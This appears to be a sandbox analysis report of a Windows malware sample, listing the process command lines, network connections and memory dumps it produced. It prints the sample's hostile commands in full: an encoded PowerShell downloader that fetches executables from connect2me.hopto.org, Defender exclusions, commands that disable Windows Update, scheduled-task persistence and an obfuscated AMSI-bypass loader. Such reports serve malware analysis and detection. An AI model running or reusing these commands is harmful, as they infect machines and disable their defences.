C:\Windows\system32\svchost.exe -k LocalService -p -s FontCache
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
C:\Users\Admin\AppData\Local\Temp\1d678410484e34165adb652f7e86a2b5cae5f58d.exe
"C:\Users\Admin\AppData\Local\Temp\1d678410484e34165adb652f7e86a2b5cae5f58d.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k WerSvcGroup
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 3900 -ip 3900
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3900 -s 260
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdABhACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAYwBqAHIAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAegBjAHMAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAYgB4AHoAIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGMAbwBuAG4AZQBjAHQAMgBtAGUALgBoAG8AcAB0AG8ALgBvAHIAZwAvAHcAbwB3AC8AMQAvADIALwAzAC8ANAAvADUALwA2AC8ANwAvAEMANABMAG8AYQBkAGUAcgAuAGUAeABlACcALAAgADwAIwBhAGEAYQAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAGMAZAB6ACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAGwAcwBqACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAEMANABMAG8AYQBkAGUAcgAuAGUAeABlACcAKQApADwAIwB3AGQAcwAjAD4AOwAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAcwA6AC8ALwBjAG8AbgBuAGUAYwB0ADIAbQBlAC4AaABvAHAAdABvAC4AbwByAGcALwB3AG8AdwAvADEALwAyAC8AMwAvADQALwA1AC8ANgAvADcALwBuAGUAdwAyAC4AZQB4AGUAJwAsACAAPAAjAGoAYgBxACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAcQB6AGEAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAYwBlAGMAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAbgBlAHcAMgAuAGUAeABlACcAKQApADwAIwBtAGIAegAjAD4AOwAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAcwA6AC8ALwBjAG8AbgBuAGUAYwB0ADIAbQBlAC4AaABvAHAAdABvAC4AbwByAGcALwB3AG8AdwAvADEALwAyAC8AMwAvADQALwA1AC8ANgAvADcALwBTAHkAcwBBAHAAcAAuAGUAeABlACcALAAgADwAIwBqAHcAYgAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAGYAcQB0ACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAHcAYgBhACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAFMAeQBzAEEAcABwAC4AZQB4AGUAJwApACkAPAAjAHUAYQB3ACMAPgA7ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGMAbwBuAG4AZQBjAHQAMgBtAGUALgBoAG8AcAB0AG8ALgBvAHIAZwAvAHcAbwB3AC8AMQAvADIALwAzAC8ANAAvADUALwA2AC8ANwAvAFMAbQBhAHIAdABEAGUAZgBSAHUAbgAuAGUAeABlACcALAAgADwAIwBoAGkAYgAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAHQAcAB2ACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAHQAcgBzACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAFMAbQBhAHIAdABEAGUAZgBSAHUAbgAuAGUAeABlACcAKQApADwAIwBqAGwAcAAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBkAGMAcgAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAZAB3AHAAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAQwA0AEwAbwBhAGQAZQByAC4AZQB4AGUAJwApADwAIwBoAHgAZwAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBwAGcAeQAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAbQBkAGYAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAbgBlAHcAMgAuAGUAeABlACcAKQA8ACMAdgBoAGUAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAZQBxAHkAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAGoAbABkACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAFMAeQBzAEEAcABwAC4AZQB4AGUAJwApADwAIwB5AGkAbQAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBjAGEAZQAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAcABrAGoAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAUwBtAGEAcgB0AEQAZQBmAFIAdQBuAC4AZQB4AGUAJwApADwAIwBoAGYAZAAjAD4A"
C:\Windows\servicing\TrustedInstaller.exe
C:\Windows\servicing\TrustedInstaller.exe
C:\Users\Admin\AppData\Local\Temp\C4Loader.exe
"C:\Users\Admin\AppData\Local\Temp\C4Loader.exe"
C:\Users\Admin\AppData\Local\Temp\new2.exe
"C:\Users\Admin\AppData\Local\Temp\new2.exe"
C:\Users\Admin\AppData\Local\Temp\SysApp.exe
"C:\Users\Admin\AppData\Local\Temp\SysApp.exe"
C:\Users\Admin\AppData\Local\Temp\SmartDefRun.exe
"C:\Users\Admin\AppData\Local\Temp\SmartDefRun.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 4348 -ip 4348
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4348 -s 304
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#thpqznhs#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'WindowsDefenderSmartScreenQC' /tr '''C:\Program Files\WindowsDefenderQC\Defender\SmartScreenQC.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\WindowsDefenderQC\Defender\SmartScreenQC.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'WindowsDefenderSmartScreenQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderSmartScreenQC" /t REG_SZ /f /d 'C:\Program Files\WindowsDefenderQC\Defender\SmartScreenQC.exe' }
C:\Windows\System32\sc.exe
sc stop UsoSvc
C:\Windows\System32\sc.exe
sc stop WaaSMedicSvc
C:\Windows\System32\sc.exe
sc stop wuauserv
C:\Windows\System32\sc.exe
sc stop bits
C:\Windows\System32\sc.exe
sc stop dosvc
C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
C:\Windows\System32\dialer.exe
C:\Windows\System32\dialer.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE "function Local:OqTqqnxpxUUB{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$JHOegpovOyGbdf,[Parameter(Position=1)][Type]$POXkxkJVKj)$pStdVAjQfcE=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+'e'+''+[Char](102)+'l'+[Char](101)+''+[Char](99)+''+[Char](116)+'e'+'d'+''+[Char](68)+''+'e'+''+[Char](108)+'e'+[Char](103)+'a'+'t'+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('In'+[Char](77)+''+[Char](101)+'m'+[Char](111)+''+'r'+''+'y'+''+[Char](77)+'o'+'d'+'u'+[Char](108)+''+[Char](101)+'',$False).DefineType(''+[Char](77)+'y'+'D'+''+'e'+''+[Char](108)+'e'+[Char](103)+''+[Char](97)+'t'+[Char](101)+''+'T'+''+[Char](121)+''+'p'+''+[Char](101)+'','C'+[Char](108)+''+[Char](97)+''+[Char](115)+''+[Char](115)+',P'+'u'+''+'b'+'l'+[Char](105)+'c'+','+'S'+'e'+''+[Char](97)+''+'l'+''+'e'+''+[Char](100)+''+[Char](44)+''+[Char](65)+'n'+[Char](115)+''+[Char](105)+''+'C'+''+[Char](108)+''+[Char](97)+'ss'+','+''+[Char](65)+''+[Char](117)+''+[Char](116)+'oCl'+[Char](97)+''+'s'+''+[Char](115)+'',[MulticastDelegate]);$pStdVAjQfcE.DefineConstructor(''+[Char](82)+''+'T'+''+'S'+''+[Char](112)+''+[Char](101)+''+'c'+'i'+[Char](97)+''+[Char](108)+'N'+[Char](97)+''+'m'+''+'e'+''+[Char](44)+''+[Char](72)+''+'i'+''+[Char](100)+''+[Char](101)+''+'B'+''+'y'+''+[Char](83)+''+[Char](105)+''+'g'+''+[Char](44)+''+[Char](80)+''+[Char](117)+''+[Char](98)+''+[Char](108)+''+'i'+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$JHOegpovOyGbdf).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+[Char](110)+'t'+'i'+''+'m'+''+'e'+''+[Char](44)+''+[Char](77)+''+'a'+'na'+[Char](103)+'e'+'d'+'');$pStdVAjQfcE.DefineMethod(''+[Char](73)+''+[Char](110)+''+'v'+'ok'+[Char](101)+'','P'+[Char](117)+''+[Char](98)+''+[Char](108)+'ic,'+[Char](72)+'i'+[Char](100)+''+'e'+''+[Char](66)+''+[Char](121)+''+[Char](83)+''+'i'+''+[Char](103)+''+[Char](44)+''+'N'+'ew'+'S'+'l'+[Char](111)+''+[Char](116)+''+[Char](44)+''+[Char](86)+''+[Char](105)+'r'+[Char](116)+''+[Char](117)+''+[Char](97)+''+[Char](108)+'',$POXkxkJVKj,$JHOegpovOyGbdf).SetImplementationFlags(''+[Char](82)+'u'+'n'+''+'t'+'ime,'+'M'+'an'+'a'+''+[Char](103)+''+[Char](101)+''+[Char](100)+'');Write-Output $pStdVAjQfcE.CreateType();}$hZPKikVsfUJWx=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+'S'+''+'y'+''+[Char](115)+''+[Char](116)+''+'e'+''+[Char](109)+''+'.'+'d'+'l'+'l')}).GetType(''+[Char](77)+''+[Char](105)+''+[Char](99)+'r'+[Char](111)+''+'s'+''+[Char](111)+''+[Char](102)+'t'+[Char](46)+''+[Char](87)+'i'+'n'+'3'+'2'+''+[Char](46)+''+[Char](85)+''+[Char](110)+'s'+'a'+''+[Char](102)+''+[Char](101)+''+[Char](104)+''+'Z'+''+'P'+''+'K'+''+[Char](105)+''+[Char](107)+'V'+[Char](115)+''+[Char](102)+'U'+'J'+''+'W'+''+[Char](120)+'');$rviDmvRVaPWBqU=$hZPKikVsfUJWx.GetMethod(''+[Char](114)+''+[Char](118)+'i'+'D'+''+[Char](109)+''+[Char](118)+'R'+[Char](86)+'aP'+[Char](87)+''+[Char](66)+'qU',[Reflection.BindingFlags]''+[Char](80)+''+[Char](117)+''+[Char](98)+''+'l'+''+[Char](105)+'c'+[Char](44)+''+'S'+''+[Char](116)+'a'+[Char](116)+'i'+[Char](99)+'',$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$OUeIcBMgvpnWPtisOcR=OqTqqnxpxUUB @([String])([IntPtr]);$mHnJbZMlaVJnsmgwHiPRYZ=OqTqqnxpxUUB @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$uJuZjRrbhBM=$hZPKikVsfUJWx.GetMethod(''+[Char](71)+''+[Char](101)+''+'t'+''+[Char](77)+''+[Char](111)+''+[Char](100)+''+'u'+'l'+'e'+''+[Char](72)+''+[Char](97)+''+[Char](110)+''+'d'+'l'+[Char](101)+'').Invoke($Null,@([Object]('k'+'e'+''+[Char](114)+''+'n'+''+'e'+''+'l'+'3'+[Char](50)+'.'+[Char](100)+''+'l'+''+'l'+'')));$fgcLWpqdtOrFOy=$rviDmvRVaPWBqU.Invoke($Null,@([Object]$uJuZjRrbhBM,[Object](''+[Char](76)+'o'+[Char](97)+''+[Char](100)+''+[Char](76)+''+'i'+'b'+[Char](114)+''+[Char](97)+''+'r'+'y'+[Char](65)+'')));$jpPDZlMaxbgghMwkm=$rviDmvRVaPWBqU.Invoke($Null,@([Object]$uJuZjRrbhBM,[Object](''+[Char](86)+''+'i'+'rt'+[Char](117)+'a'+[Char](108)+'Pr'+'o'+''+[Char](116)+''+[Char](101)+''+[Char](99)+''+[Char](116)+'')));$oHUBNYH=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($fgcLWpqdtOrFOy,$OUeIcBMgvpnWPtisOcR).Invoke(''+[Char](97)+'m'+'s'+''+[Char](105)+'.d'+[Char](108)+''+[Char](108)+'');$OiGROqBAWDYyIbDzz=$rviDmvRVaPWBqU.Invoke($Null,@([Object]$oHUBNYH,[Object](''+'A'+''+[Char](109)+'s'+[Char](105)+''+'S'+''+'c'+''+[Char](97)+''+[Char](110)+'B'+'u'+''+[Char](102)+''+[Char](102)+''+[Char](101)+''+'r'+'')));$sDESPqjCSQ=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($jpPDZlMaxbgghMwkm,$mHnJbZMlaVJnsmgwHiPRYZ).Invoke($OiGROqBAWDYyIbDzz,[uint32]8,4,[ref]$sDESPqjCSQ);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc2,0x18,0),0,$OiGROqBAWDYyIbDzz,8);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($jpPDZlMaxbgghMwkm,$mHnJbZMlaVJnsmgwHiPRYZ).Invoke($OiGROqBAWDYyIbDzz,[uint32]8,0x20,[ref]$sDESPqjCSQ);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+[Char](79)+''+[Char](70)+''+'T'+''+[Char](87)+'A'+[Char](82)+''+'E'+'').GetValue(''+[Char](100)+'i'+'a'+''+'l'+'e'+[Char](114)+''+'s'+''+[Char](116)+''+[Char](97)+''+[Char](103)+'e'+'r'+'')).EntryPoint.Invoke($Null,$Null)
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:lhfTaSYdBzhe{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$xnIWBRsJAaVnYc,[Parameter(Position=1)][Type]$mwMutZuLsN)$BpOIlHWwJEL=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('R'+'e'+'fl'+'e'+''+[Char](99)+''+[Char](116)+'e'+[Char](100)+''+[Char](68)+''+[Char](101)+''+[Char](108)+''+[Char](101)+'g'+[Char](97)+''+[Char](116)+''+'e'+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+'I'+''+'n'+'M'+[Char](101)+'m'+'o'+''+'r'+''+'y'+''+[Char](77)+'o'+'d'+'u'+'l'+''+[Char](101)+'',$False).DefineType(''+'M'+'yD'+'e'+'l'+'e'+''+[Char](103)+''+'a'+''+[Char](116)+'e'+[Char](84)+''+'y'+''+[Char](112)+'e',''+[Char](67)+''+'l'+''+[Char](97)+''+'s'+'s'+[Char](44)+''+[Char](80)+''+[Char](117)+''+[Char](98)+''+[Char](108)+''+'i'+''+[Char](99)+','+[Char](83)+''+[Char](101)+''+[Char](97)+'le'+[Char](100)+''+[Char](44)+''+[Char](65)+''+[Char](110)+''+'s'+'i'+'C'+''+'l'+'a'+[Char](115)+''+[Char](115)+''+','+''+'A'+''+[Char](117)+''+[Char](116)+''+[Char](111)+''+[Char](67)+''+[Char](108)+'a'+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$BpOIlHWwJEL.DefineConstructor(''+'R'+''+[Char](84)+'Sp'+'e'+'c'+'i'+'alN'+'a'+'me'+[Char](44)+''+[Char](72)+''+[Char](105)+''+[Char](100)+''+[Char](101)+''+'B'+''+'y'+'Si'+[Char](103)+''+[Char](44)+''+'P'+''+[Char](117)+''+[Char](98)+''+[Char](108)+''+[Char](105)+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$xnIWBRsJAaVnYc).SetImplementationFlags(''+[Char](82)+''+[Char](117)+'nt'+[Char](105)+''+'m'+'e'+[Char](44)+''+[Char](77)+'a'+[Char](110)+''+'a'+'ge'+'d'+'');$BpOIlHWwJEL.DefineMethod('I'+'n'+'v'+[Char](111)+''+'k'+'e','P'+[Char](117)+'b'+[Char](108)+''+'i'+''+'c'+''+[Char](44)+''+[Char](72)+''+'i'+'de'+[Char](66)+'y'+[Char](83)+''+'i'+''+[Char](103)+''+','+''+[Char](78)+''+'e'+''+[Char](119)+''+[Char](83)+'l'+[Char](111)+''+[Char](116)+''+[Char](44)+''+[Char](86)+''+[Char](105)+''+[Char](114)+''+[Char](116)+''+'u'+'a'+'l'+'',$mwMutZuLsN,$xnIWBRsJAaVnYc).SetImplementationFlags(''+'R'+''+[Char](117)+''+[Char](110)+'ti'+[Char](109)+'e'+[Char](44)+''+[Char](77)+''+[Char](97)+'nag'+[Char](101)+''+[Char](100)+'');Write-Output $BpOIlHWwJEL.CreateType();}$BbHmNZoVgKBdX=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+'S'+''+'y'+''+'s'+''+[Char](116)+'e'+[Char](109)+''+[Char](46)+''+[Char](100)+'l'+[Char](108)+'')}).GetType(''+[Char](77)+''+'i'+''+[Char](99)+''+'r'+''+[Char](111)+''+[Char](115)+''+[Char](111)+''+'f'+''+[Char](116)+''+[Char](46)+''+'W'+'i'+[Char](110)+'32.'+[Char](85)+''+'n'+''+'s'+'a'+[Char](102)+''+[Char](101)+''+[Char](66)+''+[Char](98)+''+'H'+''+[Char](109)+'N'+'Z'+''+[Char](111)+''+[Char](86)+'gKBd'+[Char](88)+'');$lrTXPONRIxKsYf=$BbHmNZoVgKBdX.GetMethod(''+[Char](108)+''+'r'+''+[Char](84)+'XPO'+'N'+''+[Char](82)+''+'I'+'x'+'K'+'s'+[Char](89)+''+[Char](102)+'',[Reflection.BindingFlags]''+'P'+''+'u'+''+'b'+''+[Char](108)+''+[Char](105)+''+[Char](99)+''+','+''+'S'+''+[Char](116)+'at'+'i'+''+'c'+'',$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$DMVNhzItWkqBrazkWJe=lhfTaSYdBzhe @([String])([IntPtr]);$dMBCgferDIRMUTOnuNiGNO=lhfTaSYdBzhe @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$nXCTDPmSRNb=$BbHmNZoVgKBdX.GetMethod(''+[Char](71)+'e'+'t'+''+[Char](77)+''+[Char](111)+''+[Char](100)+''+[Char](117)+''+[Char](108)+'e'+[Char](72)+''+'a'+'ndl'+[Char](101)+'').Invoke($Null,@([Object]('kern'+[Char](101)+''+[Char](108)+'3'+[Char](50)+''+[Char](46)+''+[Char](100)+'l'+[Char](108)+'')));$XikazngSLGrLtK=$lrTXPONRIxKsYf.Invoke($Null,@([Object]$nXCTDPmSRNb,[Object]('L'+[Char](111)+''+[Char](97)+''+'d'+''+[Char](76)+''+[Char](105)+''+[Char](98)+''+[Char](114)+''+[Char](97)+''+[Char](114)+''+'y'+''+[Char](65)+'')));$ZGvnTpVMXLooDeWjE=$lrTXPONRIxKsYf.Invoke($Null,@([Object]$nXCTDPmSRNb,[Object]('V'+'i'+''+'r'+''+[Char](116)+''+[Char](117)+''+[Char](97)+'l'+[Char](80)+'ro'+'t'+''+[Char](101)+'c'+[Char](116)+'')));$QlVkDOb=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($XikazngSLGrLtK,$DMVNhzItWkqBrazkWJe).Invoke('a'+[Char](109)+''+[Char](115)+'i'+[Char](46)+'d'+[Char](108)+'l');$BojBoLOzWYxilGqYi=$lrTXPONRIxKsYf.Invoke($Null,@([Object]$QlVkDOb,[Object](''+[Char](65)+''+[Char](109)+''+[Char](115)+''+[Char](105)+'S'+'c'+''+[Char](97)+'n'+[Char](66)+'u'+[Char](102)+''+'f'+''+[Char](101)+''+[Char](114)+'')));$SjaBeMAFIM=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($ZGvnTpVMXLooDeWjE,$dMBCgferDIRMUTOnuNiGNO).Invoke($BojBoLOzWYxilGqYi,[uint32]8,4,[ref]$SjaBeMAFIM);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$BojBoLOzWYxilGqYi,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($ZGvnTpVMXLooDeWjE,$dMBCgferDIRMUTOnuNiGNO).Invoke($BojBoLOzWYxilGqYi,[uint32]8,0x20,[ref]$SjaBeMAFIM);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('S'+'O'+''+[Char](70)+''+[Char](84)+'W'+[Char](65)+''+'R'+'E').GetValue(''+[Char](100)+''+[Char](105)+'a'+[Char](108)+''+'e'+''+'r'+''+[Char](115)+''+[Char](116)+''+[Char](97)+''+[Char](103)+''+[Char](101)+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{88a03707-cf97-4eaa-8ba3-4076c0137abe}
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 540 -p 3452 -ip 3452
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 412 -p 3344 -ip 3344
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 3344 -s 984
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 3452 -s 392
C:\Windows\SysWOW64\schtasks.exe
/C /create /F /sc minute /mo 1 /tn "Telemetry Logging" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\TelemetryServices\fodhelper.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Users\Admin\AppData\Roaming\Microsoft\TelemetryServices\fodhelper.exe
C:\Users\Admin\AppData\Roaming\Microsoft\TelemetryServices\fodhelper.exe
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 608 -p 2348 -ip 2348
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 2348 -s 476
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 584 -p 4328 -ip 4328
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 4328 -s 484
C:\Windows\SysWOW64\schtasks.exe
/C /create /F /sc minute /mo 1 /tn "Telemetry Logging" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\TelemetryServices\fodhelper.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Network
| Country | Destination | Domain | Proto |
| N/A | 93.184.220.29:80 | tcp | |
| N/A | 95.101.78.82:80 | tcp | |
| N/A | 104.80.225.205:443 | tcp | |
| N/A | 8.8.8.8:53 | connect2me.hopto.org | udp |
| N/A | 37.139.129.113:443 | connect2me.hopto.org | tcp |
| N/A | 107.182.129.73:21733 | tcp | |
| N/A | 93.184.221.240:80 | tcp |
Files
memory/5068-132-0x0000000000000000-mapping.dmp
memory/5068-133-0x0000000000400000-0x0000000000405000-memory.dmp
memory/5068-139-0x0000000000400000-0x0000000000405000-memory.dmp
memory/4712-140-0x0000000000000000-mapping.dmp
memory/4712-141-0x0000000002150000-0x0000000002186000-memory.dmp
memory/4712-142-0x0000000004D90000-0x00000000053B8000-memory.dmp
